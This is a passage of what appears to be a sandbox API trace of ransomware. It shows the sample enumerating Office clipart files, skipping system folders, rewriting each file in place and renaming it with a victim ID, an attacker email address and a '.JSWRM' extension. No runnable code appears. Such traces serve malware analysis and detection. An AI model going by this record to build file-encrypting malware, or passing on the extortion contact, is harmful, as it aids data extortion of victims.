| out: lpWideCharStr="9A8I36E") returned 8 [0096.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0096.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0096.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0096.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0096.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.868] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0096.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0096.869] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28ae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00828_.WMF", cAlternateFileName="")) returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2=".") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="..") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="...") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="windows") returned -1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="recovery") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="perflogs") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="documents and settings") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="system volume information") returned -1 [0096.869] lstrcmpiW (lpString1="SO00828_.WMF", lpString2="msocache") returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0096.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00828_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00828_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00828_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0096.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00828_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00828_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00828_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0096.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.870] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10414) returned 1 [0096.870] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x28a0) returned 0x24d210 [0096.870] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x28a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x28a0, lpOverlapped=0x0) returned 1 [0096.873] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.873] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x28a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x28a0, lpOverlapped=0x0) returned 1 [0096.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.873] CloseHandle (hObject=0x314) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0096.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0096.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0096.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0096.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0096.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.873] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0096.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0096.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.874] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36da, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00834_.WMF", cAlternateFileName="")) returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2=".") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="..") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="...") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="windows") returned -1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="recovery") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="perflogs") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="documents and settings") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="system volume information") returned -1 [0096.874] lstrcmpiW (lpString1="SO00834_.WMF", lpString2="msocache") returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0096.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00834_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00834_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00834_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00834_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00834_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00834_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0096.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.875] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14042) returned 1 [0096.875] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x36d0) returned 0x24d210 [0096.875] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x36d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x36d0, lpOverlapped=0x0) returned 1 [0096.878] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.878] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x36d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x36d0, lpOverlapped=0x0) returned 1 [0096.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.878] CloseHandle (hObject=0x314) returned 1 [0096.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0096.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0096.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0096.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0096.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0096.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0096.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0096.879] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0096.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0096.879] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3fe8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00837_.WMF", cAlternateFileName="")) returned 1 [0096.879] lstrcmpiW (lpString1="SO00837_.WMF", lpString2=".") returned 1 [0096.879] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="..") returned 1 [0096.879] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="...") returned 1 [0096.879] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="windows") returned -1 [0096.879] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="recovery") returned 1 [0096.879] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="perflogs") returned 1 [0096.880] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="documents and settings") returned 1 [0096.880] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.880] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="system volume information") returned -1 [0096.880] lstrcmpiW (lpString1="SO00837_.WMF", lpString2="msocache") returned 1 [0096.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0096.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00837_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00837_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00837_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0096.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0096.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00837_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00837_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00837_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0096.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0096.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.880] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16360) returned 1 [0096.880] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3fe0) returned 0x24d210 [0096.881] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3fe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3fe0, lpOverlapped=0x0) returned 1 [0096.883] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.883] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3fe0, lpOverlapped=0x0) returned 1 [0096.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.883] CloseHandle (hObject=0x314) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0096.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0096.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0096.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0096.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0096.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0096.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0096.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0096.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.885] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1898, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00910_.WMF", cAlternateFileName="")) returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2=".") returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="..") returned 1 [0096.885] lstrcmpiW 